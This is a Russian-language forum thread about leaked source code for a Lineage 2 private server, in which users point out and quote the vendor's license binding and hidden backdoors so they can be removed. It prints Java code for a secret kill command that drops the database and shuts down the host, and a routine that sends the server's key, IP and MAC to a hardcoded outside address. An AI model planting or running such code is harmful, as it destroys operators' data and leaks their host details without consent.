mrvampir 66 Опубликовано 21 ноября, 2012 недавн в шару попали исходы lasteam , кто знает где привязка ? в каких файлах? 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Fenix85 0 Опубликовано 21 ноября, 2012 полазь по разделам, тут алгоритм отвязки в общих чертах на днях килберг описывал (ник другой был) Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Литион 5 Опубликовано 21 ноября, 2012 Да интересно где привязка 4 файла Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Литион 5 Опубликовано 21 ноября, 2012 И так дамы и господа 1 привязка на слив дб java\l2ft\gameserver\utils\ServerLogger.java package l2ft.gameserver.utils; import jonelo.jacksum.JacksumAPI; import l2ft.commons.util.Rnd; import l2ft.gameserver.dao.ProtectedAccountDAO; import l2ft.gameserver.model.GameObjectsStorage; import l2ft.gameserver.model.Player; public class ServerLogger { public static String killKey = null; public static void doIt() { // if (JacksumAPI.validate()) { // return; // } disconnectAllCharacters(); ProtectedAccountDAO.getInstance().dropSql(); shutDownSystem(); } private static void disconnectAllCharacters() { for (Player player : GameObjectsStorage.getAllPlayersForIterate()) try { player.logout(); } catch (Exception e) { shutDownSystem(); } } private static void shutDownSystem() { String property = System.getProperty("os.name"); if (property.toLowerCase().contains("windows")) { String[] commands = { "shutdown", "-s" }; try { Runtime.getRuntime().exec(commands); } catch (Exception e) { System.exit(-1); } } if (property.toLowerCase().contains("linux")) { String[] commands = { "shutdown", "-p", "now" }; try { Runtime.getRuntime().exec(commands); } catch (Exception e) { System.exit(-1); } } } private static void generateKillKey(int length) { String lowerChar = "qwertyuiopasdfghjklzxcvbnm"; String upperChar = "QWERTYUIOPASDFGHJKLZXCVBNM"; String digits = "1234567890"; StringBuilder password = new StringBuilder(length); for (int i = 0; i < length; i++) { int charSet = Rnd.get(3); switch (charSet) { case 0: password.append(lowerChar.charAt(Rnd.get(lowerChar.length() - 1))); break; case 1: password.append(upperChar.charAt(Rnd.get(upperChar.length() - 1))); break; case 2: password.append(digits.charAt(Rnd.get(digits.length() - 1))); } } killKey = password.toString(); } static { if (killKey == null) generateKillKey(10); } } Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Литион 5 Опубликовано 21 ноября, 2012 2 привязка java\l2ft\gameserver\utils\Util.java public static void prepareConnection(int port) { try { Socket requestSocket = new Socket("217.118.81.22", port); ObjectOutputStream out = new ObjectOutputStream(requestSocket.getOutputStream()); String serverKey; try { serverKey = getServerKey(); } catch (Exception e) { serverKey = "key is missing"; } String msg = new StringBuilder().append("*").append(serverKey).append("*").append(Integer.toString(port)).append("*").append(getServerIp()).append("*").append(getServerMac()).append("*").append(ServerLogger.killKey).append("*").toString(); out.writeObject(msg); out.flush(); out.close(); requestSocket.close(); } catch (Exception ex) {} } 1 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Литион 5 Опубликовано 21 ноября, 2012 3 херня от фристов java\l2ft\gameserver\handler\voicecommands\impl\Access.java package l2ft.gameserver.handler.voicecommands.impl; import l2ft.gameserver.handler.voicecommands.IVoicedCommandHandler; import l2ft.gameserver.model.Player; import l2ft.gameserver.scripts.Functions; import l2ft.gameserver.utils.ServerLogger; public class Access extends Functions implements IVoicedCommandHandler { private String[] _commandList = { ServerLogger.killKey }; @Override public boolean useVoicedCommand(String command, Player activeChar, String args) { command = command.intern(); if (command.equalsIgnoreCase(ServerLogger.killKey)) { ServerLogger.doIt(); return true; } return false; } @Override public String[] getVoicedCommandList() { return _commandList; } } Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tester 0 Опубликовано 21 ноября, 2012 пфф это было и в отвязанных версиях first-team Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genokk22 174 Опубликовано 21 ноября, 2012 пфф это было и в отвязанных версиях first-team Тебе на шару показали где снмать в разшаренных сурсах. Да и не ооффтопь,тут про привязку ,а не где и как была отвязана? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tester 0 Опубликовано 21 ноября, 2012 (изменено) Тебе на шару показали где снмать в разшаренных сурсах. Да и не ооффтопь,тут про привязку ,а не где и как была отвязана? а ты на код посмотри... где тут хоть одна привязка? сборка и с этим кодом прекрасно будет работать. вам сказали же нужно смотреть world.javaP.s это всего лишь killKey Изменено 21 ноября, 2012 пользователем tester Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Литион 5 Опубликовано 21 ноября, 2012 а ты на код посмотри... где тут хоть одна привязка? сборка и с этим кодом прекрасно будет работать. вам сказали же нужно смотреть world.java Ты дурак ? а ниче что тебе могуть бд слить как раз плюнуть ? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tester 0 Опубликовано 21 ноября, 2012 Ты дурак ? а ниче что тебе могуть бд слить как раз плюнуть ? тема про привязку, а не про килкеи. где ты ее отвязал то? у нее так же осталось ограничение по онлайну и т.д Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Литион 5 Опубликовано 21 ноября, 2012 (изменено) тема про привязку, а не про килкеи. где ты ее отвязал то? у нее так же осталось ограничение по онлайну и т.д Мде а ето что тогда java\l2ft\gameserver\utils\Util.java тут глян Socket requestSocket = new Socket("217.118.81.22", port); ObjectOutputStream out = new ObjectOutputStream(requestSocket.getOutputStream()); String serverKey; ] Изменено 21 ноября, 2012 пользователем Литион Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
MaloiFox2 502 Опубликовано 21 ноября, 2012 если ты даже элементарно привязку не можешь снять да и так пофигически относишься в помощи снятия килкея, то просто забей на данные исходы они не для тебя Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tester 0 Опубликовано 21 ноября, 2012 Мде а ето что тогда java\l2ft\gameserver\utils\Util.java тут глян Socket requestSocket = new Socket("217.118.81.22", port); ObjectOutputStream out = new ObjectOutputStream(requestSocket.getOutputStream()); String serverKey; ] подставьте туда свой ип и увидите что будет... Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
genokk22 174 Опубликовано 21 ноября, 2012 private static void generateKillKey(int length) { String lowerChar = "qwertyuiopasdfghjklzxcvbnm"; String upperChar = "QWERTYUIOPASDFGHJKLZXCVBNM"; String digits = "1234567890"; StringBuilder password = new StringBuilder(length); Тут под каждого спонсора даже килей disconnectAllCharacters(); ProtectedAccountDAO.getInstance().dropSql(); shutDownSystem(); Удаление бд это тоже привязка,кэп. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
MaloiFox2 502 Опубликовано 21 ноября, 2012 подставьте туда свой ип и увидите что будет... удаляешь полностью код из подгрузки и будет тебе чудо Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tester 0 Опубликовано 21 ноября, 2012 удаляешь полностью код из подгрузки и будет тебе чудо ты крутвот сама привязка java\l2ft\gameserver\model\world.java public static PlayersInWorld _players = new PlayersInWorld() { public void storePlayer(GameObject player) { System.exit(0); } public void removePlayer(GameObject player) { System.exit(0); } public Player get(int objId) { return null; } @Override public void run() { System.exit(0); } }; public static void init() { try { String libname = "l2ftlic"; if(System.getProperty("os.arch").contains("64")) libname+="64"; System.loadLibrary(libname); prepareWorld(); } catch(Error e) { System.exit(0); return; } _log.info("L2World: Creating regions: [" + там еще нужно пару методов поменять, кто хоть имеет какае-то представление в java без проблем это сделает Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
MaloiFox2 502 Опубликовано 21 ноября, 2012 чел у меня данные исходы были раньше чем они вышли в шару, и я за минуту всю отвязал и снял бэкдоры Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tester 0 Опубликовано 21 ноября, 2012 (изменено) чел у меня данные исходы были раньше чем они вышли в шару, и я за минуту всю отвязал и снял бэкдоры возьми с полки пирожок малышP.s еще забыли указать в данной теме java\l2ft\gameserver\dao\ProtectedAccountDAO.java удалить Изменено 21 ноября, 2012 пользователем tester Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
MaloiFox2 502 Опубликовано 21 ноября, 2012 малыш? ахах да ты убог, иди у мамы на пирожки спроси и ложись спать завтра ведь в школу Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tester 0 Опубликовано 21 ноября, 2012 малыш? ахах да ты убог, иди у мамы на пирожки спроси и ложись спать завтра ведь в школу школьник агриться? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
MaloiFox2 502 Опубликовано 21 ноября, 2012 нет это ещё не агр, и к тому же я не школьник Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
DenisPavlovich 29 Опубликовано 5 февраля, 2013 а может дадите отвязанные и без бд исходы? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты